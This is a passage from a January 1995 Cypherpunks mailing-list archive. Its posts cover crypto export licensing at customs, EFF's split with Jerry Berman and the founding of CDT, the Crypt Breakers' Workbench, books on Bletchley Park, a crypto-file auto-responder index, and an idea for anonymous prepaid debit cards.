From rishab at dxm.ernet.in Sun Jan 1 04:00:48 1995 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Sun, 1 Jan 95 04:00:48 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: Matt Blaze : > So we chatted about computers and cryptography for a while. Finally, > the two of them decided that it wouldn't really hurt for them to just > sign the form as long as I promise to call my lawyer and get the SED Just which form did they sign, exactly? These procedures remind me of Feynman's refusal to sign more than 12 times during some government talk. ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From mab at research.att.com Sun Jan 1 09:21:32 1995 From: mab at research.att.com (Matt Blaze) Date: Sun, 1 Jan 95 09:21:32 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: Message-ID: <9501011723.AA12712@merckx.info.att.com> >Just which form did they sign, exactly? These procedures remind me of Feynman' s >refusal to sign more than 12 times during some government talk. The license itself has a space for the customs people to "endorse" each export/re-import. Interestingly, I can't figure out how to distinguish between the signature I got when I left and the one I got when I came back. There are just two signatures and stamps on the back of the license, one dated when I left and one dated when I returned. From pcw at access.digex.net Sun Jan 1 12:38:42 1995 From: pcw at access.digex.net (Peter Wayner) Date: Sun, 1 Jan 95 12:38:42 PST Subject: Stegno for Kids Message-ID: <199501012039.AA14592@access2.digex.net> I was at a birthday party for a nine-year old niece. She got some dolls (ugh), a Sega Game Gear Game called "Out Run" (not bad) and Crayola brand secret writing pens (WOW!!!!). There are about 8 pens in the set. You write secretly with two of them and develop the image with the other six. I believe the 6 developing pens create images in different colors, but I'm not sure. It just wouldn't look cool for me to rip open the package at SideShow Pizza and hog her gift. Then I had to go. Alas... -Peter From lile at art.net Sun Jan 1 13:21:15 1995 From: lile at art.net (Lile Elam) Date: Sun, 1 Jan 95 13:21:15 PST Subject: good news about the EFF... Message-ID: <199501012115.NAA06292@art.net> This might be of interest: ---------- Forwarded message ---------- Date: Tue, 20 Dec 1994 17:04:23 -0800 From: Brock N. Meeks To: cwd-l at cyberwerks.com Subject: CWD Changes in the Wind At EFF CyberWire Dispatch // Copyright (c) 1994 // Jacking in from the "Back to the Future" Port: Washington, DC -- The Electronic Frontier Foundation has fired its Policy Director Jerry Berman and will soon release a sweeping new agenda for 1995 that promises to return the organization to its original grassroots beginning. Asked to comment on his firing, Berman bristles and says: "I think that's baloney." Then he quickly adds: "Did you ever think I might have wanted to leave?" Berman has, in fact, left EFF, to head a new, as yet unannounced, policy group called the Center for Democracy and Technology. His departure from EFF and the creation of CDT will be made public this week in a joint announcement with EFF, sources said. The official line that will be spun to the public is that the two came to a "mutual parting of the ways." That benign statement, however, doesn't reflect the long hours of the behind the scenes deliberations, in which the language of the press releases will be a cautiously worded as an official State Department briefing. Heroes and pioneers always take the arrows; EFF lately has looked more like a pin-cushion than its self-appointed role as protector of all things Cyberspace. The beleaguered organization has over the course of the past two years endured often withering criticism from the very frontier citizens it was sworn to uphold and protect. The reason: A perceived move away from its grassroots activism to the role of a consummate Washington Insider deal maker. Berman is the man largely responsible for cutting EFF's policy cloth. He wears the suit well. Maybe too well. Although he has the political acumen to arm-wrestle inside-the-beltway, it comes at the expense of his management style, EFF insiders said. Those shortcomings came at the expense of EFF's day-to-day operations and didn't go unnoticed by its board of directors. The EFF board in October fired Berman for mismanaging the group's organizational and fiscal responsibilities. No impropriety or malfeasance was alleged, the board was simply dissatisfied with Berman's day-to-day managing of the shop. In a precursor to the board's October decision, it split Berman's job, giving him charge of just the policy arm, which board members said played to his strength. They then hired Andrew Taubman as executive director to oversee the day to day tasks. Separate from the organizational and fiscal misgivings, the board also couldn't brook with priority on policy affairs that Berman had engineered. Although Berman expertly navigated EFF through the choppy political waters of Washington, that course increasingly steered the organization away from its original vision as a populist group. Never was the hardcore policy-driven slant of EFF more apparent than during the two-plus year political firestorm that surrounded the FBI's infamous Digital Wiretap. The political wrangling during that time, in which Berman brokered the influence of EFF with the backing of the telephone, computer and software industries, to reach a compromise with legislators and the FBI on the bill's language, increasingly drove a wedge between the organization and its grassroots membership. Nobody within EFF interviewed for this article disagreed with how Berman ran his policy tour de force. In fact, the board was generally in agreement that Berman did an excellent job in helping to broker a less nefarious version of the FBI's wiretap bill than would have otherwise passed without his involvement on EFF's behalf. As effective as Berman was in shuffling between the political and ideological interests of EFF and its members, the "inside baseball" political bullshit was largely lost on the community of the Net, who viewed it as a kind of betrayal. The fact that there would be a backlash from the Net came as no surprise to Berman and EFF, who recognized the fine line they had to walk in dealing with a politically charged issue rivaled only by the Administration's insipid Clipper Chip encryption policy. You see, the Net community is a binary braintrust, a world of ones and zeros -- either on or off -- in which shades of grey are rarely an option. Yet it is exactly these shades of grey in which Berman excels and thrives. It is a skill -- and damn near an art form -- to be able to move among the shadows and Washington's land of a thousand different agendas. And that's right where Berman had steered EFF. However, it's not where the EFF board thought the organization belonged. And so, in a few days the Net community will read a grand announcement in which EFF and Jerry Berman state they've had a "mutual parting of the ways." The announcement will be several fold, including: -- The formation of Berman's new Center for Democracy and Technology. -- That EFF has hired current board member David Johnson, currently a computer law attorney with the Washington law firm of Wilmer, Cutler and Pickering, to be its new policy director, although that exact title has yet to be finalized. -- A new policy agenda for EFF that includes creation of an annual "State of the Net" report. EFF Executive Director Taubman declined to comment on Berman's firing, saying only that the organization and its former director had, indeed, agreed to a "mutual parting of the ways." He said EFF and Berman's new group would continue to work closely with each other and that the efforts of each would be mutually beneficial. Johnson said he was excited about the new policy efforts he would be heading up for EFF, which, in addition to the "State of the Net" report, includes commissioning papers and studies to help build a more solid idea of what exactly constitutes the Net "community" on a global basis and helping to define the Net's community as recognizable legal entity. In addition to the new policy efforts, Johnson will have to restock EFF's policy department: All the EFF policy wonks have jumped ship, resigning their positions and joining with Berman's new venture. The upheaval at EFF -- which included moving the entire operation here to new digs in Washington -- apparently hasn't hurt moral which has "never been higher," Taubman said. Underscoring Taubman's remarks is EFF's on-line legal council Mike Godwin, who said the changes "create an opportunity for us to return to our more populist mission and vision that we started with." All Things Being Equal ================= Adversity for a political junkie is the warp and woof of Washington culture. Berman is no worse for the wear, having parachuted out of EFF and into his new organization. He said CDT will be differ from EFF "on what to emphasize." That emphasis will be to focus on "on the ground public policy," he said. And it won't only be Berman's staff that sets the scene for familiarity as he jump starts CDT. The former EFF policy staffers will supply him with horsepower and his political currency will open doors. But he needs cold hard cash to feed the troops and pay the rent. That means his new organization must have financial backing and here, too, there are no strangers. Berman's bringing along a fair chunk of EFF's corporate sponsors to his new home. Companies providing seed money to Berman's CDT include AT&T, Bell Atlantic, Nynex, Apple Computer and Microsoft. These same companies provided a combined $235,000 in donations to EFF in 1993, minus Nynex, which wasn't listed as a major donor (over $5,000) on EFF's tax returns. It's not known if these companies will continue to fund EFF in full or in part or what amount they have pledged to Berman's group. Just how well-heeled CDT is and exactly who makes up the full roster of its sponsorship remains to be seen. We'll know that after the organization files its first tax returns, which will be a matter of public record. Meeks out... From raph at netcom.com Sun Jan 1 13:45:35 1995 From: raph at netcom.com (Raph Levien) Date: Sun, 1 Jan 95 13:45:35 PST Subject: Berman resignation In-Reply-To: <199501012115.NAA06292@art.net> Message-ID: <199501012145.NAA10782@netcom20.netcom.com> Brock's piece on Jerry Berman's resignation broke about a week after I sent my EFF t-shirt back, attn Jerry Berman. Never again believe that cypherpunk political action doesn't make a difference. Raph (BTW, I got a nice apology from Peter Lewis about the NYT article. Apparently, it got shredded in the editing process) From werewolf at io.org Sun Jan 1 14:54:07 1995 From: werewolf at io.org (Mark Terka) Date: Sun, 1 Jan 95 14:54:07 PST Subject: The Code Breaker's Work Bench? Message-ID: I saw someone mention this program on sci.crypt once. Its supposed to be an aid to those trying to break a cypher. Does anybody know the ftp site it is located on? unimi.it perhaps? -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From adam at bwh.harvard.edu Sun Jan 1 17:49:30 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Sun, 1 Jan 95 17:49:30 PST Subject: The Code Breaker's Work Bench? In-Reply-To: Message-ID: <199501020148.UAA23008@bwh.harvard.edu> | I saw someone mention this program on sci.crypt once. Its supposed to be | an aid to those trying to break a cypher. >From cbw.doc: Overview The Crypt Breakers' Workbench (CBW) is an interactive multi-window system for mounting a cipher-text only attack on a file encrypted by the Unix crypt command. CBW is a workbench in the sense that it provides the user with an integrated set of tools that simplify the initial, middle and final portions of the decryption process. A user interacts with the workbench by choosing tools and setting parameters. CBW carries out the work and displays the results. A moderately experienced user of CBW can easily decrypt both long and short messages when bigram statistics are known for the message space. The basic cryptanalytic techniques used by CBW are described in a paper by Reeds and Weinberger that appeared in the October 1984 issue of the ATT Bell Laboratories Technical Journal. This manual explains the capabilities and operating procedures of CBW coast.cs.purdue.edu:/pub/tools/unix/cbw.tar.Z From werewolf at io.org Sun Jan 1 18:55:05 1995 From: werewolf at io.org (Mark Terka) Date: Sun, 1 Jan 95 18:55:05 PST Subject: The Code Breaker's Work Bench? In-Reply-To: <199501020148.UAA23008@bwh.harvard.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In article <199501020148.UAA23008 at bwh.harvard.edu>, Adam Shostack wrote: > >| I saw someone mention this program on sci.crypt once. Its supposed to be >| an aid to those trying to break a cypher. > >>From cbw.doc: > >Overview > The Crypt Breakers' Workbench (CBW) is an interactive >multi-window system for mounting a cipher-text only attack on a file >encrypted by the Unix crypt command. CBW is a workbench in the sense Ok....I thought it was more generic than that. To mount an attack on an opponent requires specific programs oriented toward the cypher in question. Can anyone suggest what programs / tools may be out there for cypher busting? I'm just curious....and no, I'm not planning on reading my girlfirend's mail :>. I'm just interested in the methods exist in the real world. Hell, I'd even be interested in a program to bust Enigma. That would give a basic example or idea of how codebreakers operate on a day to day basis. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwdk13BFBj7pSNyhAQFqoQf+MbB7ffw3gaFuynO3riyL0MSF/143a5d3 TnbnzsMd+srKSx3bhp4SkcgIazrP3h9DzpAyriFLJl+zfdPz+kFOQGZfwPfZvEu3 fwCO+ClrKBqnJ/WiMZ0aluxfFz5NkIDolwLeeW2UfzOEcGsN4DuFvpJ66PRgLZRg Uw3qouzBjljTazyFjVlH1VaxWbywQrhiCotPvgXCrMY+CBO3FXcPW6w7pYHi8Ovh yelANTkI9cSe7f1BE0ONaEac2Xhb1htdB99goRIbxQbqP1zKUsBM+JzGvkpr4gKT ihEV3EFBGW3EGHDrCkdDqox4hnl0HRkdsH3MWt9prJXvbXvBUIfxtA== =9fAE -----END PGP SIGNATURE----- From gnu Sun Jan 1 18:55:23 1995 From: gnu (gnu) Date: Sun, 1 Jan 95 18:55:23 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park Message-ID: <9501020255.AA13843@toad.com> This is NOT David Kahn's excellent book "The Codebreakers". This is a British volume full of personal stories of thirty people who worked at Bletchley Park or at British code-breaking in the field during WW2. I found it a very touching and personal book. Each person tells their own story in a five- or six-page essay, and the stories cover a whole range of activities, from cryptanalytical work to typing-and-filing to the people who constructed and maintained the physical buildings. As the introduction says, "...few of the events described here were chronicled at the time, and those who worked at Bletchley and its outstations were forbidden to talk or write about it -- almost to remember it. The compiling of this book has rested almost entirely on personal memories; and that is unusual in an account which pretends to any sort of accuracy. Moreover, nobody who worked at Bletchley can now be under 65; several contributors are in their mid-80s. For all of us clear and accurate recollection of highly specialized Top Secret facts across fifty years has been a demanding task, requiring much cross-checking." There are lots of details about how real live wartime code-breaking worked fifty years ago -- details I have seen nowhere else. I recommend this book to any cypherpunk. Codebreakers: the inside story of Bletchley Park. ed. by Francis Harry Hinsley and Alan Stripp. Oxford, England: Oxford University Press, 1994 (hardback issued in 1993). ISBN 0-19-285304-X. US$13.95, at my local bookstore. -- John Gilmore gnu at toad.com -- gnu at cygnus.com -- gnu at eff.org A well-regulated intelligentsia, being necessary to the security of a free State, the right of the people to keep and bear books, shall not be infringed. From hayden at krypton.mankato.msus.edu Sun Jan 1 18:59:46 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Sun, 1 Jan 95 18:59:46 PST Subject: Ch-ch-ch-ch-changes... Message-ID: -----BEGIN PGP SIGNED MESSAGE----- I read with interest about the (about time) reorganization of the EFF. While it is certainly a little early to make any kind of final decisions about the EFF, I do wonder a few things: What will the EFF now be doing now that isn't already done by other organizations? It sure seems to me that this CDT is awfully similiar to the CPSR, except it's headed by former EFF people who have been puckering up to the Washington politicos, the Telcos and other entities for the past few years. Is there really a purpose? Any thoughts on how the EFF will change it's approach? I'm due for renewal in March and I want to make sure I'm not flushing my money away. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLwdsDDokqlyVGmCFAQFFlwP+NHiRjJPt8wqe4TuPoHrlAp9lbbu1Y2eZ foacY3htQgeXc2S4lcKbAvFAMEYpmjYw27IKpjSKXkuqML0x6uL7h9AGmc5EcP7h ZwWrOLhrqxqQNehGaxB6/2tqlb2W0usAkl3fwZPz/hJEPaR++ajmx/eunGFT8S6w pQWlpZL1K/0= =cuip -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> hayden at krypton.mankato.msus.edu \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> All I want is a cure... \/ Finger for PGP Public Key <=> And all my friends back! From an172607 at anon.penet.fi Sun Jan 1 19:48:12 1995 From: an172607 at anon.penet.fi (duquesne duke) Date: Sun, 1 Jan 95 19:48:12 PST Subject: cnonymity, law and order Message-ID: <9501020251.AA27454@anon.penet.fi> I want to publicly thank John Young for making articles available. MOst of those articles I would not otherwise have seen. I was particularly interested in Peter Lewis's article from the New York Tines that John offered. Was there anyone in the world, well, in the cyberworld, who was fooled by the article on the Microsoft acquisition of the Catholic church? Anyone, who after reading that piece, considered anything other than the creativity of the author, should be committed to St. John's Home for the Desperately Dumb. However, there was something in that article that was of concern. If the Massachusetts judge in the MIT student case actually said that he couldn't act because Congress had not enacted any laws, then it is for sure they will try to and they will try to act hurriedly. Hurried actions by congress are even worse than their considered actions. I think we need to keep in touch with our representatives and senators to make sure that all of the ramifications of any law are considered. Sometimes laws passed by Congress are rather well intentioned, but the bureaucrats who write the policies and procedures by which the laws will be implemented can make them an albatross around our necks. These policy and procedure writers are dreadfully misinformed and are to enamored with their power and position to inform themselves. Admittedly, anonymity and law and order are not easy bed fellows, but difficult issues are never solved by hurried, uninformed, politically-motivated action. This puts some pressure on us cypherpunks. We have to be ready to consider all aspects of the argument so that our presentation in favor of anonymity will be taken seriously. ------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From mab at crypto.com Sun Jan 1 20:21:50 1995 From: mab at crypto.com (Matt Blaze) Date: Sun, 1 Jan 95 20:21:50 PST Subject: Book review: Codebreakers, the Inside Story of Bletchley Park In-Reply-To: <9501020255.AA13843@toad.com> Message-ID: <199501020423.XAA26847@crypto.com> Let me wholeheartedly echo John's recommendation; this is a terrific book, one from which I learned a great deal. You'll get more out of it, however, the more you already know about the Bletchley Park efforts and the principles on which the Enigma and Lorenz machines operated. In particular, Welchman's "The Hut Six Story" (McGraw Hill, 1982) makes good preparatory reading. Unfortunately, that book has been out of print for some time, but is fairly widely available at used book shops. I had the opportunity to visit Bletchley Park a couple of weeks ago. Most of the original huts are still standing, albiet in various states of disrepair. Walking around the site, knowing something of what went on there in complete secrecy 50 years ago, I could only imagine the sense of urgency and bustle that must have been in the air with 12000 people working (day and night, over three shifts) in a relatively small space. The more I learn about the effort the more impressed I am with the accomplishments that took place there. In particular, the path from basic research to operational functionality was far shorter than one would think possible. After the war, the site was used by GCHQ and by British Telecom as a training center. It was recently saved from redevlopment and is now being converted into museum. Among the projects taking place there is a construction of a working model of the original "Colossus" machine, arguably the first electronic computer ever built (it was used in breaking the Lorenz teleprinter cipher). I believe the site is currently open for visitors on alternate weekends. -matt From lile at art.net Sun Jan 1 22:49:38 1995 From: lile at art.net (Lile Elam) Date: Sun, 1 Jan 95 22:49:38 PST Subject: I'm back. :) Message-ID: <199501020643.WAA08339@art.net> Hi folks, I finally got back on cypherpunks. Have been incredibly busy but wanted to keep intouch as several artist friends of mine want to start using art as a encryption vehical... Should be fun... Happy New Years. Let's hope it's a good one for cryptography. -lile ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Lile Elam | "a brush in hand, a wisp of wind, she sighs lile at art.net | knowing that this will be the great one..." http://www.art.net | -lile ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From s009amf at discover.wright.edu Sun Jan 1 23:04:48 1995 From: s009amf at discover.wright.edu (Aron Freed) Date: Sun, 1 Jan 95 23:04:48 PST Subject: good news about the EFF... In-Reply-To: <199501012115.NAA06292@art.net> Message-ID: On Sun, 1 Jan 1995, Lile Elam wrote: > CyberWire Dispatch // Copyright (c) 1994 // > > Jacking in from the "Back to the Future" Port: > > Washington, DC -- The Electronic Frontier Foundation has fired its Policy > Director Jerry Berman and will soon release a sweeping new agenda for 1995 > that promises to return the organization to its original grassroots > beginning. > > Asked to comment on his firing, Berman bristles and says: "I think that's > baloney." Then he quickly adds: "Did you ever think I might have wanted to > leave?" > > Berman has, in fact, left EFF, to head a new, as yet unannounced, policy > group called the Center for Democracy and Technology. His departure from > EFF and the creation of CDT will be made public this week in a joint > announcement with EFF, sources said. The official line that will be spun > to the public is that the two came to a "mutual parting of the ways." > > That benign statement, however, doesn't reflect the long hours of the > behind the scenes deliberations, in which the language of the press > releases will be a cautiously worded as an official State Department > briefing. > > Heroes and pioneers always take the arrows; EFF lately has looked more > like a pin-cushion than its self-appointed role as protector of all things > Cyberspace. The beleaguered organization has over the course of the past > two years endured often withering criticism from the very frontier citizens > it was sworn to uphold and protect. > > The reason: A perceived move away from its grassroots activism to the role > of a consummate Washington Insider deal maker. Has anyone seen Monty Python's Life of Brian..... DO I hear a parallelism??? Something to the effect of "The PEople's Judean Front", "The Popular People's Front", and it goes on an on.... HOw about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I hear more.. Or are we so split up that we can't agree on our common goal.... Aaron From marc at cam.ov.com Sun Jan 1 23:21:37 1995 From: marc at cam.ov.com (Marc Horowitz) Date: Sun, 1 Jan 95 23:21:37 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <9501020724.AA01894@dun-dun-noodles.cam.ov.com> >> My conclusion from all this is that it just isn't possible for an >> individual traveler to follow the rules. I can think of a at least half a dozen cypherpunks who will be going to IETF in Stockholm in July. I suspect there are more. Perhaps we should all arrange to take the same flight, while carrying some bit of approved-for-export material. Should drive the Customs guys completely nuts. Marc From skaplin at skypoint.com Sun Jan 1 23:25:31 1995 From: skaplin at skypoint.com (Samuel Kaplin) Date: Sun, 1 Jan 95 23:25:31 PST Subject: Listing of Files on the Auto-Responder as of 01-01-95 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Last Modified: 01-01-95 20:30 (CST) This is the index for Sam Kaplin's Auto-Responder. To get a file: Send a message to: skaplin at c2.org The the subject of the message MUST BE: SEND FILE [file_name] EXAMPLE: Subject: SEND FILE help <----Case Sensitive!!! All binary files are UUENCODED with PGP signatures. Please address all comments or problems to skaplin at skypoint.com. If you receive a blank message back, then the file you requested does not exist. Should you have a crypto related file that you would like added, contact me at: skaplin at skypoint.com. Please note that I am subject to the petty whims of the U.S. government, so I will not add any files which may be subject to ITAR. - -------------------------------------------------------------------------- File Name Description - -------------------------------------------------------------------------- apgp212_1.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 1 of 4 apgp212_2.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 2 of 4 apgp212_3.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 3 of 4 apgp212_4.uue Autopgp 2.12 offline mail packet processor. Automates PGP functions. Part 4 of 4 apgp22b2_1.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 1 of 4 BETA apgp22b2_2.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 2 of 4 BETA apgp22b2_3.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 3 of 4 BETA apgp22b2_4.uue Autopgp 2.2b2 offline mail packet processor. Automates PGP functions. Part 4 of 4 BETA cp-faq1.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 1 of 11 cp-faq2.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 2 of 11 cp-faq3.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 3 of 11 cp-faq4.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 4 of 11 cp-faq5.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 5 of 11 cp-faq6.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 6 of 11 cp-faq7.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 7 of 11 cp-faq8.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 8 of 11 cp-faq9.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 9 of 11 cp-faq10.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 10 of 11 cp-faq11.uue Tim May's Cypherpunk Faq - Everything you wanted to know about C'Punk issues, but were afraid to ask. Part 11 of 11 crypto1.uue The Faq from talk.politics.crypto. A general overview of cryptography. Part 1 of 2 crypto2.uue The Faq from talk.politics.crypto. A general overview of cryptography. Part 2 of 2 help This file. key Sam Kaplin's PGP Public keys. news_gateways A listing of Mail -News gateways pgpfaq1.uue Frequently asked questions about PGP. Part 1 of 2 pgpfaq2.uue Frequently asked questions about PGP. Part 2 of 2 rsa1.uue A Faq put out by RSA outlining cryptography as it applies to RSA. Part 1 of 2 rsa2.uue A Faq put out by RSA outlining cryptography as it applies to RSA. Part 2 of 2 remailer_list A current listing of remailer sites. wherefaq.long Where to obtain PGP. (Long Version) wherefaq.short Where to obtain PGP. (Short Version) yn075_1.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 1 of 14 yn075_2.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 2 of 14 yn075_3.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 3 of 14 yn075_4.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 4 of 14 yn075_5.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 5 of 14 yn075_6.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 6 of 14 yn075_7.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 7 of 14 yn075_8.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 8 of 14 yn075_9.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 9 of 14 yn075_10.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 10 of 14 yn075_11.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 11 of 14 yn075_12.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 12 of 14 yn075_13.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 13 of 14 yn075_14.uue YARN .075 offline mail reader. Minimally supports PGP internally. Part 14 of 14 ============================================================================== Interpretation is the revenge of the intellect upon art. - Susan Sontag ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwepPslnXxBRSgfNAQFjuAf/YfaeENpC16siv7SB9rkg6x1SiM5aup6n GXQQXaXtPA1pxgLDhv6gOgt/Zy/1M6tTJ/4uU2ft1KDU8wHlVt2JiU3d9/9JweZM zbpDCqh0ucyfRht2V27WMfYYfTXUQ7yHiWIg9gf2ODqQcwMEu8kAwTYZxXFmXDQ+ 9Xxchw7VR4ZGTo3cnPoh0526yKGBbi9hBr0vCr/IkTGH4cgf3BfXIF8Eolu4hQY3 r6XwcBYskN5afd/fVKA1qRhLkI3X9nP4oBNlVxdSs2cwgabQ2hZsExwtCwvHMi3K zGWAwZkd1VNMX4rC+uUkuEOR0GB9OikcRYoU9vvKDSHO1n6amnQamQ== =eeBK -----END PGP SIGNATURE----- From carolann at icicle.winternet.com Sun Jan 1 23:44:20 1995 From: carolann at icicle.winternet.com (Carol Anne Braddock) Date: Sun, 1 Jan 95 23:44:20 PST Subject: Exporting cryptographic materials, theory vs. practice In-Reply-To: <9501020724.AA01894@dun-dun-noodles.cam.ov.com> Message-ID: I couldn't agree with the general drift much more. The real objective is to get the customs officials used to the procedure of dealing the cryptograhic materials. Your best asset is a good feature reporter and a photograher. Right now, I don't think U.S. Customs is going to ask you if you have PGP in your PC if you leave the country, or return either. They should, and I'd be proud to say yes. RegisteredBEllcore Trusted Software Integrity system programmer *********************************************************************** Carol Anne Braddock "Give me your Tired, your Poor, your old PC's..." The TS NET REGISTERED PGP KEY NO.0C91594D carolann at icicle.winternet.com finger carolann at winternet.com |more *********************************************************************** My WWW Homepage Page is at: http://www.winternet.com/~carolann On Mon, 2 Jan 1995, Marc Horowitz wrote: > >> My conclusion from all this is that it just isn't possible for an > >> individual traveler to follow the rules. > > I can think of a at least half a dozen cypherpunks who will be going > to IETF in Stockholm in July. I suspect there are more. Perhaps we > should all arrange to take the same flight, while carrying some bit of > approved-for-export material. Should drive the Customs guys > completely nuts. > > Marc > From lile at art.net Mon Jan 2 00:55:30 1995 From: lile at art.net (Lile Elam) Date: Mon, 2 Jan 95 00:55:30 PST Subject: Exporting cryptographic materials, theory vs. practice Message-ID: <199501020848.AAA08819@art.net> But what if that plane crashed... It's better to spread people out over several flights... -lile From skaplin at skypoint.com Mon Jan 2 01:02:15 1995 From: skaplin at skypoint.com (Samuel Kaplin) Date: Mon, 2 Jan 95 01:02:15 PST Subject: Anonymous payment scheme Message-ID: -----BEGIN PGP SIGNED MESSAGE----- This idea just popped into my head, just as I was about to fall asleep. Being the idiot that I am, I had to get up to write it down. This idea has probably been presented before...but I haven't seen it here yet. Let's suppose myself and 10,000 of my closest friends form the First National Cypherpunk Bank and Trust. We go through all of the hassles in order to be the issuer of a Master Card or Visa. Now instead of having a credit line, it is set up as a debit card. The card's limit is how ever much you have prepaid the bank in advance. Once you have hit your prepaid amount the card no longer gets approved. Now because everything is prepaid, there is no risk to me, so I'll put any name you want on the card. The questions I have are: Is this legal in the U.S.? If so, is anyone doing it? If it's not legal in the U.S., is it legal anyplace else. If this is a gray area, why wouldn't this scheme work? If this scheme was set up, it appears to me that the infrastructure for anonymous payments/netcash is already in place. Of course the issuer would get a healthy fee for issuing the card...but then again, there truly is no such thing as a free lunch. As my 10,000 friends and I have no plans to set this up, feel free to pick it apart at will. (which I'm sure it will be) Sam ============================================================================== There is an order of things in this universe. -- Apollo, "Who Mourns for Adonais?" stardate 3468.1 ============================================================================== skaplin at skypoint.com | Finger skaplin at infinity.c2.org for | a listing of crypto related files PGP encrypted mail is accepted and | available on my auto-responder. preferred. | (Yes...the faqs are there!) | E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard Finger skaplin at mirage.skypoint.com | outside a Roman brothel. ============================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBLwe/6clnXxBRSgfNAQGZBAf9FAHHsI63OJ1uQo4SGAggs6Mk7BAe8Ysm oxibQfvNMN0dSPdyLjHutEm5/rtyTrRjU731QRQSDLUi0LSC9I0N5/cQsGeI+VV8 kAIiuHDq1eF4oZmZTuKIcKz42THliSAhSTkmpL8dZvcU3sJVPwIfGK5dNbQyUQHw J33h74Vg1jRIkeoodnAtTXPeUKi5HkcAp95zt8C/tGpke4+fx8QhqHSAvJgJoGdL a8clRTdilqwDfrdQlpgKHt33T5aLiYuQA8m9NpMiDKw/wEF+XvMrHYrksIUyQ2ZD gllxFl0WJcarRZTnIgtgAdA+hzQCbkfG10kcZUVTzquGcrgiKnp9ug== =l5Mr -----END PGP SIGNATURE----- From werewolf at io.org Mon Jan 2 01:46:07 1995 From: werewolf at io.org (Mark Terka) Date: Mon, 2 Jan 95 01:46:07 PST Subject: Anonymous payment scheme In-Reply-To: Message-ID: On Mon, 2 Jan 1995, Samuel Kaplin wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > This idea just popped into my head, just as I was about to fall asleep. > Being the idiot that I am, I had to get up to write it down. This idea has ....best time for ideas....between sleep and wakefulness.....:> > > Let's suppose myself and 10,000 of my closest friends form the First > National Cypherpunk Bank and Trust. We go through all of the hassles in > order to be the issuer of a Master Card or Visa. Now instead of having a > credit line, it is set up as a debit card. The card's limit is how ever Why jump through the hoops Visa or M/C would send you through if its a DEBIT card??? You don't need them for something like that, simply the acceptance of the Internet community, that credits from another user drawn on the Cypherpunk Bank would be accepted.....which leads to your next paragraph... > much you have prepaid the bank in advance. Once you have hit your prepaid > amount the 